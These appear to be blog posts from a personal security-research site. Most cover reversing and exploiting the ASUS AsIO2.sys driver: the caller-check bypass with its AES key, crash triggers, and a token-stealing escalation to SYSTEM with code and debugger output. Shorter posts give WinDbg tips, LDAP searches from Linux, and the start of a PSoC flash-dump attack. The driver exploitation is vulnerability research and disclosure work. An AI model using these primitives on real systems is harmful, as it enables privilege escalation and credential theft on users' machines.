Bof.

No theme, no regular posting.

Archive

© 2014-2024. Raphaël Rigo CC-BY-SA 4.0

About.

ASUS ASIO2.sys exploitation

This post is a follow up to the vuln research in ASUS AsIO2 driver, which provides, among others, Everyone the following primitives:

  • arbitrary MSR read and write
  • R/W access to arbitrary physical memory
  • a stack based buffer overflow

My initial tests on physical memory seemed to indicate it was read-only, but they were a result of me inverting the results of AllocatePhysMemory

However, it’s interesting to see how one can check the mappings between virtual and physical.

The following code will alloc physical memory using AsIO2, and map a new user accessible page and dump the content (AllocatePhysMemory is broken in x64, as we’ll see):

uint32_t phys_addr;
uint32_t virt_addr;

phys_addr = AllocatePhysMemory(0x1000, &virt_addr);
printf("AllocatePhysMemory: (virtual: %08x / physical: %08x)\n", virt_addr, phys_addr);

// Map the newly allocated physical mem
value = ASIO_MapMem(phys_addr, 0x1000);
unsigned char *ptr = (unsigned char*)value;
printf("Ptr: %p\n", ptr);
memcpy(ptr, "etst", 4);
hexdump("new mem", (void *)value, 0x10);
getchar();  // Used to flush the display and wait to trigger the breakpoint
DebugBreak();

Let’s put a breakpoint right after the call to MmAllocateContiguousMemory and run the code:

0: kd> bp AsIO2+0x1a80 "r rax; g"
0: kd> g
...
rax=ffffbb80e416c000
Break instruction exception - code 80000003 (first chance)
KERNELBASE!wil::details::DebugBreak+0x2:
0033:00007ffe`90f40bb2 cc              int     3

Now we can check which physical page is mapped to 0xffffbb80e416c000:

0: kd> !pte ffffbb80e416c000
                                           VA ffffbb80e416c000
PXE at FFFFF77BBDDEEBB8    PPE at FFFFF77BBDD77018    PDE at FFFFF77BAEE03900    PTE at FFFFF75DC0720B60
contains 0A00000003C30863  contains 0A00000003C31863  contains 0A000000502AD863  contains 0A000000BF348863
pfn 3c30      ---DA--KWEV  pfn 3c31      ---DA--KWEV  pfn 502ad     ---DA--KWEV  pfn bf348     ---DA--KWEV

As the PTE is 0x0A000000BF348863, we know the physical address is 0xBF348000

The shell displays:

AllocatePhysMemory: (virtual: e416c000 / physical: bf348000)
Ptr: 0000000000188000
new mem
  0000  10 59 de 73 dc ee ff ff 50 4c e6 73 dc ee ff ff  .Y.s....PL.s....

Note that the virtual address returned is:

  • a kernel one, unusable for userland
  • truncated as the driver only returns 32 bits.

So let’s check 0x188000 is mapped to the same physical address:

0: kd> !pte 188000
                                           VA 0000000000188000
PXE at FFFFF77BBDDEE000    PPE at FFFFF77BBDC00000    PDE at FFFFF77B80000000    PTE at FFFFF70000000C40
contains 8A00000057BBC867  contains 0A00000057BBD867  contains 0A000000447C2867  contains 8A000000BF348867
pfn 57bbc     ---DA--UW-V  pfn 57bbd     ---DA--UWEV  pfn 447c2     ---DA--UWEV  pfn bf348     ---DA--UW-V

As you can see, the PTE contains the same physical address, however, the letter U instead of K shows the virtual address is accessible to userland. And the W that is it writable. Neat !

Exploit goals and strategy

So my goal here is to get our userland process to have SYSTEM privileges. As we have access to physical memory, we could also leak sensitive data, for example by target lsass to recover credentials.

While researching various exploit strategies, I found that many drivers exhibit such vulnerabilities and that research is rather abundant. The following works were very useful:

Only having access to physical memory makes exploitation a bit more interesting:

  • we don’t have access to MmGetPhysicalAddress to do VA to PA translation
  • so we have no direct way to find interesting structures or secrets

Exploit: token stealing

Token stealing is a well known technique used for LPE, where one rewrites the token pointer in the attacker’s process to point to a privileged process’ token.

Morten Schenk has a good blog post explaining the technique.

Here, however, we have the following constraint:

  • we are in userland, so we do not know where our EPROCESS structure is in memory
  • we don’t know where our cr3 points, either
  • thanks to KASLR, there are no interesting structure at fixed physical addresses (at least that’s what I believe, with my limited knowledge of Windows internals)

I initially thought that I could use volatility’s techniques to find the interesting structures. But when I found ReWolf’s exploit I realized that it was just perfect: one just needs to implement a new class which will provide the exploit access to the target’s physical memory, which is trivial in our case.

Adding AsIO2 support to ReWolf’s exploit

Adding the provider

The WinIO provider in ReWolf’s exploit is basically identical to ours, except for the DeviceIoControl code. So no need to detail it, I just added a log to tell the user if opening the device failed (in case the ASUSCERT resource is invalid for example).

Compiling under MinGW

Of course I was not going to use Visual Studio to compile the exploit, but as it’s written in (over-engineered, in ReWolf’s own words) C++, I feared compilation would be complex.

Well, not really, I had to patch a few things such as:

  • broken includes due to case
  • add an explicit extern for GetPhysicallyInstalledSystemMemory
  • patched bstr_t to SysAllocString (Update: actually, I just needed to include comutil.h)
  • detecting the Windows 10 version to handle the new offset for Token in version 1909

Update: A friend pointed me to NtDiff which is very usefull to spot offset changes.

And of course I had to add the ASUSCERT resource entry, as described in the first post.

After doing this, running the exploit is trivial:

C:\Users\toto\Desktop>exploit asio
Win10 1909+ detected, using 0x360 for Token offset
Whoami: desktop-fa65285\toto
Found wininit.exe PID: 00000210
Looking for wininit.exe EPROCESS...
[+] Asusgio2 device opened
EPROCESS: wininit.exe, token: ffff9686b43270a8, PID: 0000000000000210
Stealing token...
Stolen token: ffff9686b43270a8
Looking for exploit.exe EPROCESS...
EPROCESS: exploit.exe, token: ffff9686b91df069, PID: 00000000000011d0
Reusing token...
Write at : 00000000001663e0
Whoami: nt authority\system

Exploit code

Grab it on GitHub.

Going further

If you want more shitty driver exploits, check hfiref0x’s gist and add support for them in the tool ;)

ASUS ASIO2.sys driver fun

So a friend built a new PC, and he installed some fans on his GPU, connected on headers on the GPU board. Unfortunately, setting the fan speed does not seems to work easily on Linux, they don’t spin. Update: He did finally have everything working. Here is the writeup.

On Windows, ASUS GPU Tweak II works. So the idea was to reverse it to understand how it works.

Having had a look the various files and drivers, he thought AsIO2.sys was a good candidate, so I offered him to reverse it quickly to check if it was interesting.

So for reference, that’s the version bundled with GPU Tweak version 2.1.7.1:

5ae23f1fcf3fb735fcf1fa27f27e610d9945d668a149c7b7b0c84ffd6409d99a AsIO2_64.sys

First look: IDA

Note: I tried to see if Ghidra was any good, but as it does not include the WDK types (yet), I was too lazy and used Hex-Rays.

The main is very simple:

__int64 __fastcall main(PDRIVER_OBJECT DriverObject)
{
  NTSTATUS v2; // ebx
  struct _UNICODE_STRING DestinationString; // [rsp+40h] [rbp-28h]
  struct _UNICODE_STRING SymbolicLinkName; // [rsp+50h] [rbp-18h]
  PDEVICE_OBJECT DeviceObject; // [rsp+70h] [rbp+8h]

  DriverObject->MajorFunction[IRP_MJ_CREATE] = dispatch;
  DriverObject->MajorFunction[IRP_MJ_CLOSE] = dispatch;
  DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = dispatch;
  DriverObject->DriverUnload = unload;
  RtlInitUnicodeString(&DestinationString, L"\\Device\\Asusgio2");
  v2 = IoCreateDevice(DriverObject, 0, &DestinationString, 0xA040u, 0, 0, &DeviceObject);
  if ( v2 < 0 )
    return (unsigned int)v2;
  RtlInitUnicodeString(&SymbolicLinkName, L"\\DosDevices\\Asusgio2");
  v2 = IoCreateSymbolicLink(&SymbolicLinkName, &DestinationString);
  if ( v2 < 0 )
    IoDeleteDevice(DeviceObject);
  return (unsigned int)v2;
}

As you can see, the driver only registers one function, which I called dispatch for the main events. Of course, the device path is important too: \\Device\\Asusgio2.

Functionalities: WTF ?

Note that AsIO2.sys comes with a companion DLL which makes it easier for us to call the various functions. Here’s the gory list, what could possibly go wrong ?

ASIO_CheckReboot
ASIO_Close
ASIO_GetCpuID
ASIO_InPortB
ASIO_InPortD
ASIO_MapMem
ASIO_Open
ASIO_OutPortB
ASIO_OutPortD
ASIO_ReadMSR
ASIO_UnmapMem
ASIO_WriteMSR
AllocatePhysMemory
FreePhysMemory
GetPortVal
MapPhysToLin
OC_GetCurrentCpuFrequency
SEG32_CALLBACK
SetPortVal
UnmapPhysicalMemory

Let’s check if everyone can access it.

Device access security

You can note in the device creation code that it is created using IoCreateDevice, and not IoCreateDeviceSecure, which means the security descriptor will be taken from the registry (initially from the .inf file), if it exists.

So here, in theory, we have a device which everyone can access. However, when trying to get the properties in WinObj, we get an “access denied” error, even as admin. After setting up WinDbg, we can check the security descriptor directly to confirm everyone should have access:

0: kd> !devobj \device\asusgio2
Device object (ffff9685541c3d40) is for:
 Asusgio2 \Driver\Asusgio2 DriverObject ffff968551f33d40
Current Irp 00000000 RefCount 1 Type 0000a040 Flags 00000040
SecurityDescriptor ffffdf84fd2b90a0 DevExt 00000000 DevObjExt ffff9685541c3e90 
ExtensionFlags (0x00000800)  DOE_DEFAULT_SD_PRESENT
Characteristics (0000000000)  
Device queue is not busy.
0: kd> !sd ffffdf84fd2b90a0 0x1
->Revision: 0x1
->Sbz1    : 0x0
->Control : 0x8814
            SE_DACL_PRESENT
            SE_SACL_PRESENT
            SE_SACL_AUTO_INHERITED
            SE_SELF_RELATIVE
->Owner   : S-1-5-32-544 (Alias: BUILTIN\Administrators)
->Group   : S-1-5-18 (Well Known Group: NT AUTHORITY\SYSTEM)
->Dacl    : 
->Dacl    : ->AclRevision: 0x2
->Dacl    : ->Sbz1       : 0x0
->Dacl    : ->AclSize    : 0x5c
->Dacl    : ->AceCount   : 0x4
->Dacl    : ->Sbz2       : 0x0
->Dacl    : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl    : ->Ace[0]: ->AceFlags: 0x0
->Dacl    : ->Ace[0]: ->AceSize: 0x14
->Dacl    : ->Ace[0]: ->Mask : 0x001201bf
->Dacl    : ->Ace[0]: ->SID: S-1-1-0 (Well Known Group: localhost\Everyone)
[...]

And indeed, Everyone should have RWE access (0x001201bf). But for some reason, WinObj gives an “acces denied” error, even when running as admin.

Caller Process check

Why does it fail to open the device ? Let’s dig into the dispatch function. At the beginning we can see that sub_140001EA8 is called to determine if the access should fail.

  if ( !info->MajorFunction ) {
    res = !sub_140001EA8() ? STATUS_ACCESS_DENIED : 0;
    goto end;
  }

Inside sub_140001EA8 are several interesting things, including the function sub_1400017B8, which does:

[...]
  v4 = ZwQueryInformationProcess(-1i64, ProcessImageFileName, v3);
      if ( v4 >= 0 )
        RtlCopyUnicodeString(DestinationString, v3);

So it queries the path of the process doing the request, passes it to sub_140002620, which reads it into a newly allocated buffer:

if ( ZwOpenFile(&FileHandle, 0x80100000, &ObjectAttributes, &IoStatusBlock, 1u, 0x20u) >= 0
    && ZwQueryInformationFile(FileHandle, &IoStatusBlock, &FileInformation, 0x18u, FileStandardInformation) >= 0 )
  {
    buffer = ExAllocatePoolWithTag(NonPagedPool, FileInformation.EndOfFile.LowPart, 'pPR');
    res = buffer;
    if ( buffer )
    {
      memset(buffer, 0, FileInformation.EndOfFile.QuadPart);
      if ( ZwReadFile( FileHandle, 0i64, 0i64, 0i64, &IoStatusBlock, res,
             FileInformation.EndOfFile.LowPart, &ByteOffset, 0i64) < 0 )

So let’s rename those functions: we have check_caller which calls get_process_name and read_file and get_PE_timestamp (which is better viewed in assembly)

.text:140002DA8 get_PE_timestamp proc near              ; CODE XREF: check_caller+B3↑p
.text:140002DA8                 test    rcx, rcx
.text:140002DAB                 jnz     short loc_140002DB3
.text:140002DAD                 mov     eax, STATUS_UNSUCCESSFUL
.text:140002DB2                 retn
.text:140002DB3 ; ---------------------------------------------------------------------------
.text:140002DB3
.text:140002DB3 loc_140002DB3:                          ; CODE XREF: get_PE_timestamp+3↑j
.text:140002DB3                 movsxd  rax, [rcx+IMAGE_DOS_HEADER.e_lfanew]
.text:140002DB7                 mov     ecx, [rax+rcx+IMAGE_NT_HEADERS.FileHeader.TimeDateStamp]
.text:140002DBB                 xor     eax, eax
.text:140002DBD                 mov     [rdx], ecx
.text:140002DBF                 retn
.text:140002DBF get_PE_timestamp endp

If we look at the high level logic of check_call we have (aes_decrypt is easy to identify thanks to constants):

res = get_PE_timestamp(file_ptr, &pe_timestamp);
if ( res >= 0 ) {
  res = sub_1400028D0(file_ptr, &pos, &MaxCount);
  if ( res >= 0 ) {
    if ( MaxCount > 0x10 )
      res = STATUS_ACCESS_DENIED;
    else {
      some_data = 0i64;
      memmove(&some_data, (char *)file_ptr + pos, MaxCount);
      aes_decrypt(&some_data);
      diff = pe_timestamp - some_data;
      diff2 = pe_timestamp - some_data;
      if ( diff2 < 0 )
      {
        diff = some_data - pe_timestamp;
        diff2 = some_data - pe_timestamp;
      }
      res = STATUS_ACCESS_DENIED;
      if ( diff < 7200 )
        res = 0;
    }
  }
}

So sub_1400028D0 reads some information from the calling’s process binary, decrypts it using AES and checks it is within 2 hours of the PE timestamp…

Bypassing the check

So, I won’t get into the details, as it’s not very interesting (it’s just PE structures parsing, which looks ugly), but one of the sub functions gives us a big hint:

bool __fastcall compare_string_to_ASUSCERT(PCUNICODE_STRING String1)
{
  _UNICODE_STRING DestinationString; // [rsp+20h] [rbp-18h]

  RtlInitUnicodeString(&DestinationString, L"ASUSCERT");
  return RtlCompareUnicodeString(String1, &DestinationString, 0) == 0;
}

The code parses the calling PE to look for a resource named ASUSCERT, which we can verify in atkexComSvc.exe, the service which uses the driver:

ASUSCERT resource

and we can use openssl to check that the decrypted value corresponds to the PE timestamp:

$ openssl aes-128-ecb -nopad -nosalt -d -K AA7E151628AED2A6ABF7158809CF4F3C -in ASUSCERT.dat  |hd
00000000  38 df 6d 5d 00 00 00 00  00 00 00 00 00 00 00 00  |8.m]............|
$ date --date="@$((0x5d6ddf38))"
Tue Sep  3 05:34:16 CEST 2019
$ x86_64-w64-mingw32-objdump -x atkexComSvc.exe|grep -i time/date
Time/Date		Tue Sep  3 05:34:37 2019

Once we know this, we just need to generate a PE with the right ASUSCERT resource and which uses the driver.

Compiling for Windows on Linux

As I hate modern Visual Studio versions (huge, mandatory registration, etc.) and am more confortable under Linux, I set to compile everything on my Debian.

In fact, nowadays it’s easy, just install the necessary tools with apt install mingw-w64.

This Makefile has everything, including using windres to compile the resource file, which is directly linked by gcc!

CC=x86_64-w64-mingw32-gcc
COPTS=-std=gnu99

asio2: asio2.c libAsIO2_64.a ASUSCERT.o
	$(CC) $(COPTS) -o asio2 -W -Wall asio2.c  libAsIO2_64.a ASUSCERT.o

libAsIO2_64.a: AsIO2_64.def
	x86_64-w64-mingw32-dlltool -d AsIO2_64.def -l libAsIO2_64.a

ASUSCERT.o:
	./make_ASUSCERT.py
	x86_64-w64-mingw32-windres ASUSCERT.rc ASUSCERT.o

Notes:

  • I created the .def using Dll2Def
  • make_ASUSCERT.py just gets the current time and encrypts it to generate ASUSCERT_now.dat
  • ASUSCERT.rc is one line: ASUSCERT RCDATA ASUSCERT_now.dat

Update: Dll2Def is useless, the dll can be directly specified to gcc:

$(CC) $(COPTS) -o asio2 -W -Wall asio2.c  AsIO2_64.dll ASUSCERT.o

Using AsIO2.sys

As a normal user, we can now use all the functions the driver provides. For example: BSOD by overwriting the IA32_LSTAR MSR:

extern int ASIO_WriteMSR(unsigned int msr_num, uint64_t *val);

ASIO_WriteMSR(0xC0000082, &value);

Or allocating, and mapping arbitrary physical memory:

value = ASIO_MapMem(0xF000, 0x1000);

printf("MapMem: %016" PRIx64 "\n", value);
hexdump("0xF000", (void *)value, 0x100);

will display:

MapMem: 000000000017f000
0xF000
  0000  00 f0 00 40 ec f7 ff ff 00 40 00 40 ec f7 ff ff  ...@.....@.@....
  0010  cb c8 44 0e 00 00 00 00 46 41 43 50 f4 00 00 00  ..D.....FACP....
  0020  04 40 49 4e 54 45 4c 20 34 34 30 42 58 20 20 20  .@INTEL 440BX
  0030  00 00 04 06 50 54 4c 20 40 42 0f 00 00 30 f7 0f  ....PTL @B...0..
  0040  b0 e1 42 0e 00 00 09 00 b2 00 00 00 00 00 00 00  ..B.............
  0050  40 04 00 00 00 00 00 00 44 04 00 00 00 00 00 00  @.......D.......
  0060  00 00 00 00 48 04 00 00 4c 04 00 00 00 00 00 00  ....H...L.......

Vulnerabilities

BSOD while reading resources

As the broken decompiled code shows, the OffsetToData field of the ASUSCERT resource entry is added to the section’s offset, and will be dereferenced when reading the resource’s value.

if ( compare_string_to_ASUSCERT(&String1) )
{
    ASUSCERT_entry_off = next_dir->entries[j].OffsetToData;
    LODWORD(ASUSCERT_entry_off) = ASUSCERT_entry_off & 0x7FFFFFFF;
    ASUSCERT_entry = (meh *)((char *)rsrc + ASUSCERT_entry_off);
    if ( (ASUSCERT_entry->entries[j].OffsetToData & 0x80000000) == 0 )
    {
        ASUSCERT_off = ASUSCERT_entry->entries[0].OffsetToData;
        *res_size = *(unsigned int *)((char *)&rsrc->Size + ASUSCERT_off);
        if ( *(DWORD *)((char *)&rsrc->OffsetToData + ASUSCERT_off) )
        v25 = *(unsigned int *)((char *)&rsrc->OffsetToData + ASUSCERT_off)
            + sec->PointerToRawData
            - (unsigned __int64)sec->VirtualAddress;
        else
        v25 = 0i64;
        *asus_cert_pos = v25;
        res = 0;
        break;
    }
}

So, setting the OffsetToData to a large value will trigger an out of bounds reads, and BSOD:

*** Fatal System Error: 0x00000050
                       (0xFFFF82860550C807,0x0000000000000000,0xFFFFF8037D4F3140,0x0000000000000002)

Driver at fault: 
***     AsIO2.sys - Address FFFFF8037D4F3140 base at FFFFF8037D4F0000, DateStamp 5cac6cf4

0: kd> kv
 #  RetAddr           : Args to Child                        : Call Site
00  fffff803`776a9942 : ffff8286`0550c807 00000000`00000003  : nt!DbgBreakPointWithStatus
[...]
06  fffff803`7d4f3140 : fffff803`7d4f1fb3 00000000`00000000  : nt!KiPageFault+0x360
07  fffff803`7d4f1fb3 : 00000000`00000000 ffff8285`05514000  : AsIO2+0x3140
08  fffff803`7d4f1b96 : 00000000`c0000002 00000000`00000000  : AsIO2+0x1fb3
09  fffff803`7750a939 : fffff803`77aaf125 00000000`00000000  : AsIO2+0x1b96
0a  fffff803`775099f4 : 00000000`00000000 00000000`00000000  : nt!IofCallDriver+0x59
[...]
15  00000000`0040176b : 00007ffe`fa041b1c 00007ffe`ebd2a336  : AsIO2_64!ASIO_Open+0x45
16  00007ffe`fa041b1c : 00007ffe`ebd2a336 00007ffe`ebd2a420  : asio2_rsrc_bsod+0x176b

AsIO2+0x1fb3 is the address right after the memmove:

memmove(&ASUSCERT, (char *)file_ptr + asus_cert_pos, MaxCount);
decrypt(&ASUSCERT);

Trivial stack based buffer overflow

The UnMapMem function is vulnerable to the most basic buffer overflow a driver can have:

  map_mem_req Dst; // [rsp+40h] [rbp-30h]
  [...]
  v15 = info->Parameters.DeviceIoControl.InputBufferLength;
  memmove(&Dst, Irp->AssociatedIrp.SystemBuffer, size);

Which can be triggered with a simple:

#define ASIO_UNMAPMEM 0xA0402450
int8_t buffer[0x48] = {0};
DWORD returned;

DeviceIoControl(driver, ASIO_UNMAPMEM, buffer, sizeof(buffer), 
                                       buffer, sizeof(buffer),
                                       &returned, NULL);

A small buffer will trigger a BugCheck because of the stack cookie validation, and a longer buffer (4096) will just trigger an out of bounds read:

*** Fatal System Error: 0x00000050
                       (0xFFFFD48D003187C0,0x0000000000000002,0xFFFFF806104031D0,0x0000000000000002)

Driver at fault: 
***     AsIO2.sys - Address FFFFF806104031D0 base at FFFFF80610400000, DateStamp 5cac6cf4

0: kd> kv
 #  RetAddr           : Args to Child                       : Call Site
00  fffff806`0c2a9942 : ffffd48d`003187c0 00000000`00000003 : nt!DbgBreakPointWithStatus
[...]
06  fffff806`104031d0 : fffff806`10401a0a ffffc102`cef7a948 : nt!KiPageFault+0x360
07  fffff806`10401a0a : ffffc102`cef7a948 ffffe008`00000000 : AsIO2+0x31d0
08  fffff806`0c10a939 : ffffc102`cc0f9e00 00000000`00000000 : AsIO2+0x1a0a
09  fffff806`0c6b2bd5 : ffffd48d`00317b80 ffffc102`cc0f9e00 : nt!IofCallDriver+0x59
0a  fffff806`0c6b29e0 : 00000000`00000000 ffffd48d`00317b80 : nt!IopSynchronousServiceTail+0x1a5
0b  fffff806`0c6b1db6 : 00007ffb`3634e620 00000000`00000000 : nt!IopXxxControlFile+0xc10
0c  fffff806`0c1d3c15 : 00000000`00000000 00000000`00000000 : nt!NtDeviceIoControlFile+0x56
0d  00007ffb`37c7c1a4 : 00007ffb`357d57d7 00000000`00000018 : nt!KiSystemServiceCopyEnd+0x25 
0e  00007ffb`357d57d7 : 00000000`00000018 00000000`00000001 : ntdll!NtDeviceIoControlFile+0x14

Bug: broken 64 bits code

The AllocatePhysMemory function is broken on 64 bits:

      alloc_virt = MmAllocateContiguousMemory(*systembuffer_, (PHYSICAL_ADDRESS)0xFFFFFFFFi64);
      HIDWORD(systembuffer) = (_DWORD)alloc_virt;
      LODWORD(systembuffer) = MmGetPhysicalAddress(alloc_virt).LowPart;
      *(_QWORD *)systembuffer_ = systembuffer;

MmAllocateContiguousMemory returns a 64 bits value, but the code truncates it to 32 bits before returning it to userland, which will probably trigger some BSOD later…

Going further

Exploitability

Given the extremely powerful primitives we have here, an arbitrary code exec exploit is very likely. I will try to exploit it and, maybe, do a writeup about it.

Disclosure ?

So, after looking at that driver, I thought that it was too obviously vulnerable that I would be the first one to see it. And indeed, several people looked at it before:

Considering the vulnerability was already public and seeing the pain Secure Auth Labs had to go through, I did not try to coordinate disclosure.

WinDbg: setting up a cross-VM debugging, tips

Setting up WinDbg can be a real pain. This posts documents how to lessen the pain (or at least to make it less painful to do another setup).

Requirements:

  • a Windows 10 VM (I use VMWare workstation)
  • WinDbg (classic, not Preview) installed in that VM

Getting started with network KD

A few things to keep in mind:

  • the debugee connects to the host
  • you will have no error message if things fail

The reference documentation is here but is not that practical.

Network setup

  • Clone the host VM into a target VM
  • Add a second network interface to both VMs (this could probably be done before, but I have not tested it):
    • make sure the interface hardware is supported by WinDbg
    • set it up on a specific “LAN segment” so that only those two VMs are on it
    • setup the host to be 192.168.0.1/24
    • setup the target to be 192.168.0.2/24
    • allow everything on the host firewall from this interface (or configure appropriate rules)
  • make sure you can ping the host from the target

WinDbg setup, on the target

  • go to the device manager to lookup the properties of your NIC (the one the LAN segment) and note the bus, device and function numbers NIC properties
  • in an elevated shell, run the following commands, replacing the busparams values with yours, and KEY with something more secure (careful, use 4 dots):
    bcdedit /dbgsettings net HOSTIP:192.168.0.1 PORT:50000 KEY:TO.TO.TU.TU nodhcp
    bcdedit /set "{dbgsettings}" busparams 27.0.0
    bcdedit /debug on
    

If you need more infos about the various options, see the documentation.

WinDbg setup, on the host:

  • run WinDbg
  • configure your symbol path to cache*c:\MySymbols;srv*https://msdl.microsoft.com/download/symbols, by either:
    • using “File->Symbol file path”
    • setting the _NT_SYMBOL_PATH environment variable
  • start a Kernel Debug session (Ctrl-K)
  • enter your KEY, press OK (port 50000 should be the default)
  • (optional) run Wireshark on your LAN segment interface, to make sure the packets are reaching your interface
  • command line to start it faster: -k net:port=50000,key=TO.TO.TU.TU

Connecting things

Now, you can reboot your target, and you should get the following in your host’s WinDbg shell:

Connected to target 169.254.221.237 on port 50000 on local IP 192.168.0.1.
You can get the target MAC address by running .kdtargetmac command.
Connected to Windows 10 18362 x64 target at (Fri Mar 27 14:41:52.051 2020 (UTC + 1:00)), ptr64 TRUE
Kernel Debugger connection established.

As you can see, since we specified the nodhcp option in the target’s config, the source IP is in the “Automatic private IP” range. So if your host’s firewall is not completely open, make sure this range is allowed.

You can make sure things work correctly by disassembling some symbol:

0: kd> u ZwQueryInformationProcess
nt!ZwQueryInformationProcess:
fffff803`697bec50 488bc4          mov     rax,rsp
fffff803`697bec53 fa              cli
fffff803`697bec54 4883ec10        sub     rsp,10h
fffff803`697bec58 50              push    rax
fffff803`697bec59 9c              pushfq
fffff803`697bec5a 6a10            push    10h
fffff803`697bec5c 488d055d750000  lea     rax,[nt!KiServiceLinkage (fffff803`697c61c0)]
fffff803`697bec63 50              push    rax

WinDbg gotchas

So, WinDbg is a weird beast, here are a few things to know:

  • lookups can be slow, for example: !object \ can take 1s per line on my setup !
  • “normal”, dot, and bang commands are, respectively: built-ins, meta commands controlling the debugger itself, commands from extensions (source).
  • numbers are in hex by default (20 => 0x20)

Cheat “sheet”

symbols

.reload /f => force symbol reload 
.reload /unl module => force symbol reload for a module that's not loaded

disassembly

u address => disassembly (ex: u ntdll+0x1000).
"u ." => eip
u . l4 => 4 lines from eip

breakpoints, running

bc nb => clear bp nb
bd nb => disable bp nb
bc/bd * => clear/disable all bps
bp addr => set bp
bp /1 addr => bp one-shot (deleted after first trig)
bl => list bp
ba => hardware bp
ba r 8 /p addr1 /t addr2 addr3
  => r==break RW access ; 
     8==size to monitor ; 
     /p EPROCESS address (process) ;
     /t thread addresse
     addr3 == actual ba adress
bp addr ".if {command1;command2} .else {command}"
p => single step
pct => continue til next call or ret
gu => go til next ret

data

da - dump ascii
db - dump bytes  => displays byte + ascii
dd - dump DWords
dp - dump pointer-sized values
dq - dump QWords
du - dump Unicode (16 bits characters)
dw - dump Words
deref => poi(address)
!da !db !dq addr => display mem at PHYSICAL address

editing:

ed addr value => set value at given address
eq => qword
a addr => assemble (x86 only) at this address (empty line to finish=)

structures:

dt nt!_EPROCESS addr => dump EPROCESS struct at addr

State, processes, etc

lm       => list modules
kb, kv   => callstack
!peb     => peb of current process
!teb     => teb of current thread
!process 0 0 => display all processes
!process my_process.exe => show info for "my_process.exe"
!sd addr => dump security descriptor

drivers:

!object \Driver\
!drvobj Asgio2 => dump \Driver\Asgio2

devices:

!devobj Asgio2 => dump \Device\Asgio2

memory:

!address => dump address space
!pte VA => dump PTEs for VA

Thanks

A lot of thanks to Fist0urs for the help and cheat sheet ;)

Active Directory searches from Linux

Imagine you have a Linux PC inside an Active Directory domain, and that you want to be able to request information using LDAP, over TLS, using Kerberos authentication. In theory, everything is easy, in practice, not so much.

For the impatient, here is the magic command line, provided that you already requested a valid TGT using kinit username@REALM.SOMETHING.CORP:

ldapsearch  -N  -H 'ldaps://dc.fdqn:3269' -b "dc=ou,dc=something,dc=corp" -D "username@REALM.SOMETHING.CORP" -LLL -Y GSSAPI -O minssf=0,maxssf=0 '(mail=john.doe*)' mail 

So, let’s break down the different options:

  • -N: Do not use reverse DNS to canonicalize SASL host name. If your DC has no valid reverse DNS, this is needed.
  • -H 'ldaps://dc.fdqn:3269': use TLS (ldaps), on port 3269 (Global Catalog)
  • -b "searchbase": the root of your search, you will have to change it.
  • -D "binddn": your username@REALM, used for Kerberos (may be omitted)
  • -LLL: remove useless LDIF stuff in output
  • -Y GSSAPI: specify that we want to use GSSAPI as an SASL mechanism
  • -O minssf=0,maxssf=0: black magic to avoid problems with SASL when using TLS

You may also have to play with the LDAPTLS_REQCERT environment variable or with $HOME/.ldaprc. For example, you can put:

TLS_CACERT /full/path/to/your/ca.pem

Note that the -Z does not work as it uses StartTLS and not native TLS.

Reminders:

  • host -t srv _ldap._tcp.pdc._msdcs.ou.org.corp to find a DC hostname
  • ldapsearch -xLLL -h ldaphostname -b "" -s base to look for the different LDAP roots
  • You need to install the required packages: libsasl2-modules-gssapi-mit (or -heimdal)

Aigo Chinese encrypted HDD − Part 2: Dumping the Cypress PSoC 1

TL;DR

I dumped a Cypress PSoC 1 (CY8C21434) flash memory, bypassing the protection, by doing a cold-boot stepping attack, after reversing the undocumented details of the in-system serial programming protocol (ISSP).

It allows me to dump the PIN of the hard-drive from part 1 directly:

$ ./psoc.py 
syncing:  KO  OK
[...]
PIN:  1 2 3 4 5 6 7 8 9  

Code:

Introduction

So, as we have seen in part 1, the Cypress PSoC 1 CY8C21434 microcontroller seems like a good target, as it may contain the PIN itself. And anyway, I could not find any public attack code, so I wanted to take a look at it.

Our goal is to read its internal flash memory and so, the steps we have to cover here are to:

  • manage to “talk” to the microcontroller
  • find a way to check if it is protected against external reads (most probably)
  • find a way to bypass the protection

There are 2 places where we can look for the valid PIN:

  • the internal flash memory
  • the SRAM, where it may be stored to compare it to the PIN entered by the user

ISSP Protocol

ISSP ??

“Talking” to a micro-controller can imply different things from vendor to vendor but most of them implement a way to interact using a serial protocol (ICSP for Microchip’s PIC for example).

Cypress’ own proprietary protocol is called ISSP for “in-system serial programming protocol”, and is (partially) described in its documentation. US Patent US7185162 also gives some information.

There is also an open source implemention called HSSP, which we will use later.

ISSP basically works like this:

  • reset the µC
  • output a magic number to the serial data pin of the µC to enter external programming mode
  • send commands, which are actually long strings of bits called “vectors”

The ISSP documentation only defines a handful of such vectors:

  • Initialize-1
  • Initialize-2
  • Initialize-3 (3V and 5V variants)
  • ID-SETUP
  • READ-ID-WORD
  • SET-BLOCK-NUM: 10011111010dddddddd111 where dddddddd=block #
  • BULK ERASE
  • PROGRAM-BLOCK
  • VERIFY-SETUP
  • READ-BYTE: 10110aaaaaaZDDDDDDDDZ1 where DDDDDDDD = data out, aaaaaa = address (6 bits)
  • WRITE-BYTE: 10010aaaaaadddddddd111 where dddddddd = data in, aaaaaa = address (6 bits)
  • SECURE
  • CHECKSUM-SETUP
  • READ-CHECKSUM: 10111111001ZDDDDDDDDZ110111111000ZDDDDDDDDZ1 where DDDDDDDDDDDDDDDD = Device Checksum data out
  • ERASE BLOCK

For example, the vector for Initialize-2 is:

1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111
1101111111100010010111

Each vector is 22 bits long and seem to follow some pattern. Thankfully, the HSSP doc gives us a big hint: “ISSP vector is nothing but a sequence of bits representing a set of instructions.”

Demystifying the vectors

Now, of course, we want to understand what’s going on here. At first, I thought the vectors could be raw M8C instructions, but the opcodes did not match.

Then I just googled the first vector and found this research by Ahmed Ismail which, while it does not go into much details, gives a few hints to get started: “Each instruction starts with 3 bits that select 1 out of 4 mnemonics (read RAM location, write RAM location, read register, or write register.) This is followed by the 8-bit address, then the 8-bit data read or written, and finally 3 stop bits.”

Then, reading the Techical reference manual’s section on the Supervisory ROM (SROM) is very useful. The SROM is hardcoded (ROM) in the PSoC and provides functions (like syscalls) for code running in “userland”:

  • 00h : SWBootReset
  • 01h : ReadBlock
  • 02h : WriteBlock
  • 03h : EraseBlock
  • 06h : TableRead
